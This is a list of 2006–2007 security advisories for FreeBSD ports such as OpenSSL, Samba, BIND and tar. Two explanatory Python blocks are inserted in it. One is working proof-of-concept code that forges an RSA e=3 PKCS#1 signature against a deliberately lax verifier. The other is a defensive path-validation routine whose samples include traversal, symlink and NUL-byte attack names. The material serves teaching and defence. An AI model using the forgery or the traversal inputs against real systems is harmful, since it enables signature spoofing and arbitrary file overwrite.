| 2007-03-21* | Squid advisory 2007:1 notes: Due to an internal error Squid-2.6 is vulnerable to a denial of service attack when processing the TRACE request method. Workarounds: To work around the problem deny access to using the TRACE method by inserting the following two lines before your first http_access rule. acl TRACE method TRACE http_access deny TRACE more... | squid |
| 2007-03-16 | Chris Travers reports: George Theall of Tenable Security notified the LedgerSMB core team today of an authentication bypass vulnerability allowing full access to the administrator interface of LedgerSMB 1.1 and SQL-Ledger 2.x. The problem is caused by the password checking routine failing to enforce a password check under certain circumstances. The user can then create accounts or effect denial of service attacks. This is not related to any previous CVE. We have coordinated with the SQL-Ledger vendor and today both of us released security patches correcting the problem. SQL-Ledger users who can upgrade to 2.6.26 should do so, and LedgerSMB 1.1 or 1.0 users should upgrade to 1.1.9. Users who cannot upgrade should configure their web servers to use http authentication for the admin.pl script in the main root directory. more... | sql-ledger |
| 2007-03-16 | The Samba Team reports: Internally Samba's file server daemon, smbd, implements support for deferred file open calls in an attempt to serve client requests that would otherwise fail due to a share mode violation. When renaming a file under certain circumstances it is possible that the request is never removed from the deferred open queue. smbd will then become stuck in a loop trying to service the open request. This bug may allow an authenticated user to exhaust resources such as memory and CPU on the server by opening multiple CIFS sessions, each of which will normally spawn a new smbd process, and sending each connection into an infinite loop. more... | ja-samba samba |
| 2007-03-16 | The Samba Team reports: NOTE: This security advisory only impacts Samba servers that share AFS file systems to CIFS clients and which have been explicitly instructed in smb.conf to load the afsacl.so VFS module. The source defect results in the name of a file stored on disk being used as the format string in a call to snprintf(). This bug becomes exploitable only when a user is able to write to a share which utilizes Samba's afsacl.so library for setting Windows NT access control lists on files residing on an AFS file system. more... | ja-samba samba |
| 2007-03-16* | An undisclosed eRuby injection vulnerability has been discovered in tDiary. more... | ja-tdiary ja-tdiary-devel tdiary tdiary-devel |
| 2007-03-16* | tDiary was vulnerable to an unspecified Cross-Site Scripting vulnerability. more... | ja-tdiary ja-tdiary-devel tdiary tdiary-devel |
| 2007-03-14* | Two problems have been found in KTorrent: KTorrent does not properly sanitize file names to filter out ".." components, so it's possible for an attacker to create a malicious torrent in order to overwrite arbitrary files within the filesystem. Messages with invalid chunk indexes aren't rejected. more... | ktorrent ktorrent-devel |
| 2007-03-12* | Multiple vulnerabilities have been found in PHP, including: buffer overflows, stack overflows, format string, and information disclosure vulnerabilities. The session extension contained safe_mode and open_basedir bypasses, but the FreeBSD Security Officer does not consider these real security vulnerabilities, since safe_mode and open_basedir are insecure by design and should not be relied upon. more... | mod_php mod_php4 mod_php4-twig mod_php5 php4 php4-cgi php4-cli php4-dtc php4-horde php4-nms php4-odbc php4-session php4-shmop php4-wddx php5 php5-cgi php5-cli php5-dtc php5-horde php5-imap php5-nms php5-odbc php5-session php5-shmop php5-sqlite php5-wddx |
| 2007-03-09 | Moritz Jodeit reports: There's an exploitable buffer overflow in the current version of MPlayer (v1.0rc1) which can be exploited with a maliciously crafted video file. It's hidden in the function DMO_VideoDecoder() in the file loader/dmo/DMO_VideoDecoder.c. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2007-03-09 | Secunia reports: The vulnerability is caused due to an error within the "download wiki page as text" function, which can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Successful exploitation may require that the victim uses IE. more... | ja-trac trac |
| 2007-03-06* | TippingPoint and The Zero Day Initiative report: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache Tomcat JK Web Server Connector. Authentication is not required to exploit this vulnerability. The specific flaw exists in the URI handler for the mod_jk.so library, map_uri_to_worker(), defined in native/common/jk_uri_worker_map.c. When parsing a long URL request, the URI worker map routine performs an unsafe memory copy. This results in a stack overflow condition which can be leveraged to execute arbitrary code. more... | mod_jk mod_jk-ap2 |
| 2007-02-27 | Problem Description: A type * (ANY) query response containing multiple RRsets can trigger an assertion failure. Certain recursive queries can cause the nameserver to crash by using memory which has already been freed. Impact: A remote attacker sending a type * (ANY) query to an authoritative DNS server for a DNSSEC signed zone can cause the named(8) daemon to exit, resulting in a Denial of Service. A remote attacker sending recursive queries can cause the nameserver to crash, resulting in a Denial of Service. Workaround: There is no workaround available, but systems which are not authoritative servers for DNSSEC signed zones are not affected by the first issue; and systems which do not permit untrusted users to perform recursive DNS resolution are not affected by the second issue. Note that the default configuration for named(8) in FreeBSD allows local access only (which on many systems is equivalent to refusing access to untrusted users). more... | named |
| 2007-02-26 | Problem Description: If the end of an archive is reached while attempting to "skip" past a region of an archive, libarchive will enter an infinite loop wherein it repeatedly attempts (and fails) to read further data. Impact: An attacker able to cause a system to extract (via "tar -x" or another application which uses libarchive) or list the contents (via "tar -t" or another libarchive-using application) of an archive provided by the attacker can cause libarchive to enter an infinite loop and use all available CPU time. Workaround: No workaround is available. more... | libarchive |
| 2007-02-26 | Problem Description: Several problems have been found in OpenSSL: During the parsing of certain invalid ASN1 structures an error condition is mishandled, possibly resulting in an infinite loop. A buffer overflow exists in the SSL_get_shared_ciphers function. A NULL pointer may be dereferenced in the SSL version 2 client code. In addition, many applications using OpenSSL do not perform any validation of the lengths of public keys being used. Impact: Servers which parse ASN1 data from untrusted sources may be vulnerable to a denial of service attack. An attacker accessing a server which uses SSL version 2 may be able to execute arbitrary code with the privileges of that server. A malicious SSL server can cause clients connecting using SSL version 2 to crash. Applications which perform public key operations using untrusted keys may be vulnerable to a denial of service attack. Workaround: No workaround is available, but not all of the vulnerabilities mentioned affect all applications. more... | openssl |
| 2007-02-21 | An IBM Internet Security Systems Protection Advisory reports: Snort is vulnerable to a stack-based buffer overflow as a result of DCE/RPC reassembly. This vulnerability is in a dynamic-preprocessor enabled in the default configuration, and the configuration for this preprocessor allows for auto-recognition of SMB traffic to perform reassembly on. No checks are performed to see if the traffic is part of a valid TCP session, and multiple Write AndX requests can be chained in the same TCP segment. As a result, an attacker can exploit this overflow with a single TCP PDU sent across a network monitored by Snort or Sourcefire. Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should re-enable the DCE/RPC preprocessor. more... | snort |
| 2007-02-17 | iDefense reports: Remote exploitation of a stack based buffer overflow vulnerability in RARLabs Unrar may allow an attacker to execute arbitrary code with the privileges of the user opening the archive. Unrar is prone to a stack based buffer overflow when processing specially crafted password protected archives. If users are using the vulnerable command line based unrar, they still need to interact with the program in order to trigger the vulnerability. They must respond to the prompt asking for the password, after which the vulnerability will be triggered. They do not need to enter a correct password, but they must at least push the enter key. more... | rar unrar zh-unrar |
| 2007-01-17 | Secunia reports: Some vulnerabilities have been reported in Joomla!, where some have unknown impacts and one can be exploited by malicious people to conduct cross-site scripting attacks. Input passed to an unspecified parameter is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerabilities are caused due to unspecified errors in Joomla!. The vendor describes them as "several low level security issues". No further information is currently available. more... | joomla |
| 2007-01-15 | Secunia reports: A vulnerability in sircd can be exploited by a malicious person to compromise a vulnerable system. The vulnerability is caused by a boundary error in the code handling reverse DNS lookups, when a user connects to the service. If the FQDN (Fully Qualified Domain Name) returned is excessively long, the allocated buffer is overflowed making it possible to execute arbitrary code on the system with the privileges of the sircd daemon. more... | sircd |
| 2007-01-15 | Secunia reports: A vulnerability has been reported in sircd, which can be exploited by malicious users to gain operator privileges. The problem is that any user reportedly can set their usermode to operator. The vulnerability has been reported in versions 0.5.2 and 0.5.3. Other versions may also be affected. more... | sircd |
| 2007-01-12 | Secunia reports: rgod has discovered four vulnerabilities in Cacti, which can be exploited by malicious people to bypass certain security restrictions, manipulate data and compromise vulnerable systems. more... | cacti |
| 2007-01-08 | A potential buffer overflow was found in the code used to handle RealMedia RTSP streams. When checking for matching asm rules, the code stores the results in a fixed-size array, but no boundary checks are performed. This may lead to a buffer overflow if the user is tricked into connecting to a malicious server. Since the attacker can not write arbitrary data into the buffer, creating an exploit is very hard; but a DoS attack is easily made. A fix for this problem was committed to SVN on Sun Dec 31 13:27:53 2006 UTC as r21799. The fix involves three files: stream/realrtsp/asmrp.c, stream/realrtsp/asmrp.h and stream/realrtsp/real.c. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2007-01-06 | Matthias Andree reports: When delivering messages to a message delivery agent by means of the "mda" option, fetchmail can crash (by passing a NULL pointer to ferror() and fflush()) when refusing a message. SMTP and LMTP delivery modes aren't affected. more... | fetchmail |
| 2007-01-06 | Matthias Andree reports: Fetchmail has had several longstanding password disclosure vulnerabilities. sslcertck/sslfingerprint options should have implied "sslproto tls1" in order to enforce TLS negotiation, but did not. Even with "sslproto tls1" in the config, fetches would go ahead in plain text if STLS/STARTTLS wasn't available (not advertised, or advertised but rejected). POP3 fetches could completely ignore all TLS options whether available or not because it didn't reliably issue CAPA before checking for STLS support - but CAPA is a requisite for STLS. Whether or not CAPAbilities were probed, depended on the "auth" option. (Fetchmail only tried CAPA if the auth option was not set at all, was set to gssapi, kerberos, kerberos_v4, otp, or cram-md5.) POP3 could fall back to using plain text passwords, even if strong authentication had been configured. POP2 would not complain if strong authentication or TLS had been requested. more... | fetchmail |
| 2007-01-05 | iDefense reports: The vulnerability specifically exists due to Opera improperly processing a JPEG DHT marker. The DHT marker is used to define a Huffman Table which is used for decoding the image data. An invalid number of index bytes in the DHT marker will trigger a heap overflow with partially user controlled data. Exploitation of this vulnerability would allow an attacker to execute arbitrary code on the affected host. The attacker would first need to construct a website containing the malicious image and trick the vulnerable user into visiting the site. This would trigger the vulnerability and allow the code to execute with the privileges of the local user. A flaw exists within Opera's Javascript SVG implementation. When processing a createSVGTransformFromMatrix request Opera does not properly validate the type of object passed to the function. Passing an incorrect object to this function can result in it using a pointer that is user controlled when it attempts to make the virtual function call. Exploitation of this vulnerability would allow an attacker to execute arbitrary code on the affected host. The attacker would first need to construct a website containing the malicious JavaScript and trick the vulnerable user into visiting the site. This would trigger the vulnerability and allow the code to execute with the privileges of the local user. more... | linux-opera opera opera-devel |
| 2007-01-05 | The Drupal security team reports: A few arguments passed via URLs are not properly sanitized before display. When an attacker is able to entice an administrator to follow a specially crafted link, arbitrary HTML and script code can be injected and executed in the victim's session. Such an attack may lead to administrator access if certain conditions are met. The way page caching was implemented allows a denial of service attack. An attacker has to have the ability to post content on the site. He or she would then be able to poison the page cache, so that it returns cached 404 page not found errors for existing pages. If the page cache is not enabled, your site is not vulnerable. The vulnerability only affects sites running on top of MySQL. more... | drupal |
| 2007-01-03 | An anonymous person reports: w3m-0.5.1 crashes when using the -dump or -backend options to open a HTTPS URL with a SSL certificate where the CN contains "%n%n%n%n%n%n". more... | ja-w3m ja-w3m-img w3m w3m-img w3m-m17n w3m-m17n-img |
| 2006-12-27 | Plone.org reports: PlonePAS-using Plone releases (Plone 2.5 and Plone 2.5.1) have a potential vulnerability that allows a user to masquerade as a group. Please update your sites. more... | plone |
| 2006-12-27* | Secunia reports: A vulnerability has been reported in Zope, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an error in the use of the docutils module to parse and render "restructured" text. This can be exploited to disclose certain information via the "csv_table" reStructuredText directive. more... | zope |
| 2006-12-24* | Secunia reports: ShAnKaR has discovered a vulnerability in phpBB, which can be exploited by malicious users to compromise a vulnerable system. Input passed to the "avatar_path" parameter in admin/admin_board.php is not properly sanitised before being used as a configuration variable to store avatar images. This can be exploited to upload and execute arbitrary PHP code by changing "avatar_path" to a file with a trailing NULL byte. Successful exploitation requires privileges to the administration section. more... | phpbb zh-phpbb-tw |
| 2006-12-21 | The proftpd development team reports that several remote buffer overflows have been found in the proftpd server. more... | proftpd proftpd-mysql |
| 2006-12-19 | Problem Description: For a recursive DNS server, a remote attacker sending enough recursive queries for the replies to arrive after all the interested clients have left the recursion queue will trigger an INSIST failure in the named(8) daemon. Also for a recursive DNS server, an assertion failure can occur when processing a query whose reply will contain more than one SIG(covered) RRset. For an authoritative DNS server serving a RFC 2535 DNSSEC zone which is queried for the SIG records where there are multiple SIG(covered) RRsets (e.g. a zone apex), named(8) will trigger an assertion failure when it tries to construct the response. Impact: An attacker who can perform recursive lookups on a DNS server and is able to send a sufficiently large number of recursive queries, or is able to get the DNS server to return more than one SIG(covered) RRsets can stop the functionality of the DNS service. An attacker querying an authoritative DNS server serving a RFC 2535 DNSSEC zone may be able to crash the DNS server. Workaround: A possible workaround is to only allow trusted clients to perform recursive queries. more... | bind9 |
| 2006-12-19 | Problem Description: When verifying a PKCS#1 v1.5 signature, OpenSSL ignores any bytes which follow the cryptographic hash being signed. In a valid signature there will be no such bytes. Impact: OpenSSL will incorrectly report some invalid signatures as valid. When an RSA public exponent of 3 is used, or more generally when a small public exponent is used with a relatively large modulus (e.g., a public exponent of 17 with a 4096-bit modulus), an attacker can construct a signature which OpenSSL will accept as a valid PKCS#1 v1.5 signature. Workaround: No workaround is available. more... | openssl |
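The OpenSSL entry above describes the verifier bug but not why "ignoring the bytes after the hash" is enough to forge a signature. The following Python is an added example, not OpenSSL's code: it implements the correct EMSA-PKCS1-v1_5 encoding, a strict verifier, a lax verifier with the reported flaw, and the e = 3 forgery (Bleichenbacher's 2006 attack). Because the public exponent is 3, the attacker only needs an integer s whose cube, written out as a key-length block, starts with `00 01 FF 00 DigestInfo || H(m)`; the trailing bytes are arbitrary, and since s^3 is smaller than the modulus no modular reduction ever happens. The 1024-bit toy key, the message and the seed are all constructed here for the demonstration; the code needs Python 3.8+ for `pow(e, -1, m)`.

```python
# Added example (not OpenSSL's code): PKCS#1 v1.5 forgery against a verifier
# that ignores trailing bytes, using a toy 1024-bit key with e = 3.
import hashlib
import random

SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")  # RFC 3447, 9.2 note 1

def byte_len(n):
    return (n.bit_length() + 7) // 8

def emsa_pkcs1_v15(msg, k):
    """Correct encoding: 00 01 FF..FF 00 DigestInfo||H(msg), exactly k bytes."""
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def rsa_public(n, e, sig):
    """s^e mod n, rendered as a k-byte block."""
    return pow(int.from_bytes(sig, "big"), e, n).to_bytes(byte_len(n), "big")

def verify_strict(n, e, msg, sig):
    """Compares the whole block, as RFC 3447 requires."""
    return rsa_public(n, e, sig) == emsa_pkcs1_v15(msg, byte_len(n))

def verify_lax(n, e, msg, sig):
    """The bug: walk the padding, find DigestInfo||H(msg), and never check
    that the hash is the *last* thing in the block."""
    em = rsa_public(n, e, sig)
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if em[:2] != b"\x00\x01" or i == 2 or i >= len(em) or em[i] != 0x00:
        return False
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t           # trailing bytes ignored

def icbrt_ceil(x):
    """Smallest integer r with r**3 >= x (integer Newton iteration)."""
    r = 1 << ((x.bit_length() + 2) // 3)            # starts above the root
    while True:
        nr = (2 * r + x // (r * r)) // 3
        if nr >= r:
            return r if r ** 3 >= x else r + 1
        r = nr

def forge_e3(n, msg):
    """Choose s with s**3 < n (so no reduction mod n) whose k-byte form starts
    with 00 01 FF 00 DigestInfo||H(msg); everything after that is garbage."""
    k = byte_len(n)
    prefix = b"\x00\x01\xff\x00" + SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    free = k - len(prefix)
    low = int.from_bytes(prefix + b"\x00" * free, "big")
    high = int.from_bytes(prefix + b"\xff" * free, "big")
    s = icbrt_ceil(low)
    if not s ** 3 <= high < n:
        raise ValueError("too few free bytes for an e=3 forgery at this key size")
    return s.to_bytes(k, "big")

def is_probable_prime(n, rounds=20):
    """Miller-Rabin; adequate for a toy key."""
    if n < 2 or any(n % p == 0 for p in (2, 3, 5, 7, 11, 13)):
        return n in (2, 3, 5, 7, 11, 13)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_key(bits=1024, e=3):
    """Toy RSA key with e = 3; p and q chosen so gcd(e, p-1) = gcd(e, q-1) = 1."""
    def prime(b):
        while True:
            p = random.getrandbits(b) | (3 << (b - 2)) | 1   # top two bits set
            if (p - 1) % e and is_probable_prime(p):
                return p
    p, q = prime(bits // 2), prime(bits // 2)
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))

def sign(n, d, msg):
    k = byte_len(n)
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n).to_bytes(k, "big")

def demo(seed=2006):
    random.seed(seed)                                # reproducible toy key
    n, e, d = gen_key()
    msg = b"constructed message: pay 100 to mallory"
    genuine, forged = sign(n, d, msg), forge_e3(n, msg)
    return {
        "strict/genuine": verify_strict(n, e, msg, genuine),
        "lax/genuine": verify_lax(n, e, msg, genuine),
        "strict/forged": verify_strict(n, e, msg, forged),
        "lax/forged": verify_lax(n, e, msg, forged),
    }
```

`demo()` returns a mapping in which the genuine signature passes both verifiers while the forged one passes only the lax verifier. The forgery works whenever the free region after the hash is larger than the rounding error of the cube root, which is why the advisory also mentions small exponents such as 17 with large moduli: the larger the modulus relative to the exponent, the more room there is for the garbage.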
| 2006-12-18 | The Debian Security Team reports: Several remote vulnerabilities have been discovered in SQL Ledger, a web based double-entry accounting program, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: Chris Travers discovered that the session management can be tricked into hijacking existing sessions. Chris Travers discovered that directory traversal vulnerabilities can be exploited to execute arbitrary Perl code. It was discovered that missing input sanitising allows execution of arbitrary Perl code. more... | sql-ledger |
| 2006-12-15* | Werner Koch reports: GnuPG uses data structures called filters to process OpenPGP messages. These filters are used in a similar way as pipelines in the shell. For communication between these filters context structures are used. These are usually allocated on the stack and passed to the filter functions. At most places the OpenPGP data stream fed into these filters is closed before the context structure gets deallocated. While decrypting encrypted packets, this may not happen in all cases and the filter may use a void context structure filled with garbage. An attacker may control this garbage. The filter context includes another context used by the low-level decryption to access the decryption algorithm. This is done using a function pointer. By carefully crafting an OpenPGP message, an attacker may control this function pointer and call an arbitrary function of the process. Obviously an exploit needs to be prepared for a specific version, compiler, libc, etc to be successful - but it is definitely doable. Fixing this is obvious: We need to allocate the context on the heap and use a reference count to keep it valid as long as either the controlling code or the filter code needs it. We have checked all other usages of such stack based filter contexts but fortunately found no other vulnerable places. This allows to release a relatively small patch. However, for reasons of code cleanness and easier audits we will soon start to change all these stack based filter contexts to heap based ones. more... | gnupg |
| 2006-12-15* | The official ruby site reports: Another vulnerability has been discovered in the CGI library (cgi.rb) that ships with Ruby which could be used by a malicious user to create a denial of service attack (DoS). A specific HTTP request for any web application using cgi.rb causes CPU consumption on the machine on which the web application is running. Many such requests result in a denial of service. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma ruby_static |
| 2006-12-15* | Secunia reports: Doubles has discovered a vulnerability in Unzoo, which potentially can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an input validation error when unpacking archives. This can be exploited via a directory traversal attack to overwrite files outside the directory, where the files are extracted to, if a user is tricked into extracting a malicious archive using Unzoo. more... | unzoo |
| 2006-12-15* | Official ruby site reports: A vulnerability has been discovered in the CGI library (cgi.rb) that ships with Ruby which could be used by a malicious user to create a denial of service attack (DoS). The problem is triggered by sending the library an HTTP request that uses multipart MIME encoding and an invalid boundary specifier that begins with "-" instead of "--". Once triggered it will exhaust all available memory resources effectively creating a DoS condition. more... | ruby ruby+oniguruma ruby+pthreads ruby+pthreads+oniguruma ruby_static |
| 2006-12-14 | Secunia reports: D-Bus has a weakness, which can be exploited by malicious, local users to cause a DoS (Denial of Service). An error within the "match_rule_equal()" function can be exploited to disable the ability of other processes to receive messages by removing their matches from D-Bus. more... | dbus |
| 2006-12-14 | Secunia reports: A vulnerability has been discovered in Evince, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the "get_next_text()" function in ps/ps.c. This can be exploited to cause a buffer overflow by e.g. tricking a user into opening a specially crafted PostScript file. more... | evince |
| 2006-12-13 | Secunia reports: Some vulnerabilities have been reported in wvWare, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise an application using the library. The vulnerabilities are caused due to integer overflows within the "wvGetLFO_records()" and "wvGetLFO_PLF()" functions. These can be exploited to cause heap-based buffer overflows by e.g. tricking a user to open a specially crafted Microsoft Word document with an application using the library. more... | wv |
| 2006-12-13 | Secunia reports: A vulnerability has been reported in wvWare wv2 Library, which potentially can be exploited by malicious people to compromise an application using the library. The vulnerability is caused due to an integer overflow error in "word_helper.h" when handling a Word document. This can be exploited to cause a buffer overflow and may allow arbitrary code execution via a specially crafted Word document. more... | wv2 |
| 2006-12-11 | The tnftpd port suffers from a remote stack overrun, which can lead to a root compromise. more... | tnftpd |
| 2006-12-09* | The libxine development team reports that several vulnerabilities have been found in the libxine library. The first vulnerability is caused by improper checking in the src/input/libreal/real.c "real_parse_sdp()" function. A remote attacker could exploit this by tricking a user into connecting to a prepared server, potentially causing a buffer overflow. Another buffer overflow has been found in the libmms library, potentially allowing a remote attacker to cause a denial of service, and possibly remote code execution, through the following functions: send_command, string_utf16, get_data and get_media_packets. Other functions might be affected as well. more... | libxine |
| 2006-12-02 | SecurityFocus reports about libmusicbrainz: The libmusicbrainz library is prone to multiple buffer-overflow vulnerabilities because the application fails to check the size of the data before copying it into a finite-sized internal memory buffer. An attacker can exploit these issues to execute arbitrary code within the context of the application or to cause a denial-of-service condition. more... | libmusicbrainz |
| 2006-12-02 | SecurityFocus reports about ImageMagick: ImageMagick is prone to a remote heap-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. Exploiting this issue allows attackers to execute arbitrary machine code in the context of applications that use the ImageMagick library. more... | ImageMagick |
| 2006-11-30 | Teemu Salmela reports: There is a tar record type, called GNUTYPE_NAMES (an obsolete GNU extension), that allows the creation of symbolic links pointing to arbitrary locations in the filesystem, which makes it possible to create/overwrite arbitrary files. more... | gtar |
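Four entries on this page are the same extractor mistake seen from different sides: KTorrent (2007-03-14) and Unzoo (2006-12-15) let ".." components in member names escape the destination directory, gtar's GNUTYPE_NAMES record above lets an archive create a symbolic link to an arbitrary location that a later member can then be written through, and the phpBB entry (2006-12-24) shows a NUL byte truncating a path after validation. The Python below is an added example, not code from any of those projects: a purely lexical policy an extractor can apply to every member before writing anything, which rejects NUL bytes, absolute names, names that normalise to outside the root, and symlink targets that point outside the root, and which remembers the symlinks it has accepted so a later member is resolved to where it would actually land. It assumes "/"-separated member names (tar, zoo and torrent style) and the archive listing is constructed for the demonstration.

```python
# Added example (not KTorrent, Unzoo, gtar or phpBB code): lexical path policy
# for an archive extractor. Member names are assumed to use "/" separators.
import posixpath


class ExtractPolicy:
    """Validates member paths relative to the extraction root and remembers
    symlinks already accepted from this archive, so that a later member that
    passes through one of them is resolved to where it would really be written."""

    MAX_LINK_DEPTH = 8

    def __init__(self):
        self.links = {}   # accepted symlink path -> resolved target (root-relative)

    def _clean(self, name):
        if "\x00" in name:
            raise ValueError("NUL byte in path: %r" % name)
        if name.startswith("/"):
            raise ValueError("absolute path: %r" % name)
        norm = posixpath.normpath(name)            # collapses 'a/./b' and 'a/x/../b'
        if norm in (".", "..") or norm.startswith("../"):
            raise ValueError("escapes extraction root: %r" % name)
        return norm

    def _resolve(self, norm, depth=0):
        """Rewrite any leading component that is a known symlink to its target."""
        if depth > self.MAX_LINK_DEPTH:
            raise ValueError("symlink chain too deep at %r" % norm)
        parts = norm.split("/")
        for i in range(1, len(parts) + 1):
            prefix = "/".join(parts[:i])
            if prefix in self.links:
                rest = "/".join(parts[i:])
                real = posixpath.normpath(posixpath.join(self.links[prefix], rest))
                if real in (".", "..") or real.startswith("../"):
                    raise ValueError("path through symlink escapes root: %r" % norm)
                return self._resolve(real, depth + 1)
        return norm

    def check(self, name, linkname=None):
        """Return the root-relative path this member would actually write to,
        or raise ValueError if the member must be skipped."""
        norm = self._resolve(self._clean(name))
        if linkname is not None:
            if "\x00" in linkname or linkname.startswith("/"):
                raise ValueError("absolute or NUL symlink target: %r" % linkname)
            # Link targets are relative to the link's own directory.
            target = posixpath.normpath(posixpath.join(posixpath.dirname(norm), linkname))
            if target in (".", "..") or target.startswith("../"):
                raise ValueError("symlink target escapes root: %r -> %r" % (name, linkname))
            self.links[norm] = self._resolve(target)
        return norm


def scan(entries):
    """Apply the policy to (name, linkname) pairs in archive order. Returns
    (name, result) pairs where result is the resolved path or 'SKIP: reason'."""
    policy = ExtractPolicy()
    out = []
    for name, linkname in entries:
        try:
            out.append((name, policy.check(name, linkname)))
        except ValueError as exc:
            out.append((name, "SKIP: " + str(exc)))
    return out


# Constructed archive listing for the demonstration (not from a real archive).
SAMPLE_ENTRIES = [
    ("docs/readme.txt", None),        # ordinary file
    ("../../etc/passwd", None),       # KTorrent / Unzoo style traversal
    ("a/b/../../../x", None),         # traversal hidden behind normal components
    ("/etc/cron.d/job", None),        # absolute member name
    ("avatar.php\x00.gif", None),     # NUL-byte truncation trick
    ("etc", "/etc"),                  # absolute symlink target (GNUTYPE_NAMES style)
    ("up", "../outside"),             # relative symlink escaping the root
    ("deep/sub", "../other"),         # harmless symlink that stays inside the root
    ("deep/sub/file", None),          # lands in other/file, not deep/sub/file
]

if __name__ == "__main__":
    for name, result in scan(SAMPLE_ENTRIES):
        print("%-22r %s" % (name, result))
```

The check is deliberately lexical so it can run before any file is created; the last two sample entries show why the accepted-symlink table matters, since "deep/sub/file" is reported as "other/file", the place it would really be written. A real extractor should additionally refuse to follow symlinks that already exist on disk (for example with O_NOFOLLOW), which no lexical check can cover.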
| 2006-11-30 | iDefense Labs reports: Remote exploitation of a design error in Horde's Kronolith could allow an authenticated web mail user to execute arbitrary PHP code under the security context of the running web server. The vulnerability specifically exists due to a design error in the way it includes certain files. Specifically, the 'lib/FBView.php' file contains a function 'Kronolith_FreeBusy_View::factory' which will include local files that are supplied via the 'view' HTTP GET request parameter. more... | kronolith |
| 2006-11-27 | Werner Koch reports: When running GnuPG interactively, special crafted messages may be used to crash gpg or gpg2. Running gpg in batch mode, as done by all software using gpg as a backend (e.g. mailers), is not affected by this bug. Exploiting this overflow seems to be possible. gpg-agent, gpgsm, gpgv or other tools from the GnuPG suite are not affected. more... | gnupg |
| 2006-11-15* | FrSIRT reports: A vulnerability has been identified in ProFTPD, which could be exploited by attackers to cause a denial of service or execute arbitrary commands. This flaw is due to a buffer overflow error in the "main.c" file where the "cmd_buf_size" size of the buffer used to handle FTP commands sent by clients is not properly set to the size configured via the "CommandBufferSize" directive, which could be exploited by attackers to compromise a vulnerable server via a specially crafted FTP command. more... | proftpd proftpd-mysql |
| 2006-11-15* | OS Reviews reports: If the update of the stats via web front-end is allowed, a remote attacker can execute arbitrary code on the server using a specially crafted request involving the migrate parameter. Input starting with a pipe character ("|") leads to an insecure call to Perl's open function and the rest of the input being executed in a shell. The code is run in the context of the process running the AWStats CGI. Arbitrary code can be executed by uploading a specially crafted configuration file if an attacker can put a file on the server with chosen file name and content (e.g. by using an FTP account on a shared hosting server). In this configuration file, the LogFile directive can be used to execute shell code following a pipe character. As above, an open call on unsanitized input is the source of this vulnerability. more... | awstats |
| 2006-11-11 | A Bugzilla Security Advisory reports: Sometimes the information put into the and tags in Bugzilla was not properly escaped, leading to a possible XSS vulnerability. Bugzilla administrators were allowed to put raw, unfiltered HTML into many fields in Bugzilla, leading to a possible XSS vulnerability. Now, the HTML allowed in those fields is limited. attachment.cgi could leak the names of private attachments. The "deadline" field was visible in the XML format of a bug, even to users who were not a member of the "timetrackinggroup." A malicious user could pass a URL to an admin, and make the admin delete or change something that he had not intended to delete or change. It is possible to inject arbitrary HTML into the showdependencygraph.cgi page, allowing for a cross-site scripting attack. more... | bugzilla ja-bugzilla |
| 2006-11-11* | Some vulnerabilities have been reported in Bugzilla, which can be exploited by malicious users to conduct SQL injection attacks, and by malicious people to disclose sensitive information and conduct script insertion attacks. more... | bugzilla ja-bugzilla |
| 2006-11-08 | Secunia reports: Some vulnerabilities have been reported in imlib2, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise an application using the library. The vulnerabilities are caused due to unspecified errors within the processing of JPG, ARGB, PNG, LBM, PNM, TIFF, and TGA images. This may be exploited to execute arbitrary code by e.g. tricking a user into opening a specially crafted image file with an application using imlib2. more... | imlib2 |
| 2006-11-08* | Problem Description: A temporary file is created, used, deleted, and then re-created with the same name. This creates a window during which an attacker could replace the file with a link to another file. While cvsbug(1) is based on the send-pr(1) utility, this problem does not exist in the version of send-pr(1) distributed with FreeBSD. In FreeBSD 4.10 and 5.3, some additional problems exist concerning temporary file usage in both cvsbug(1) and send-pr(1). Impact: A local attacker could cause data to be written to any file to which the user running cvsbug(1) (or send-pr(1) in FreeBSD 4.10 and 5.3) has write access. This may cause damage in itself (e.g., by destroying important system files or documents) or may be used to obtain elevated privileges. Workaround: Do not use the cvsbug(1) utility on any system with untrusted users. Do not use the send-pr(1) utility on a FreeBSD 4.10 or 5.3 system with untrusted users. more... | cvs+ipv6 |
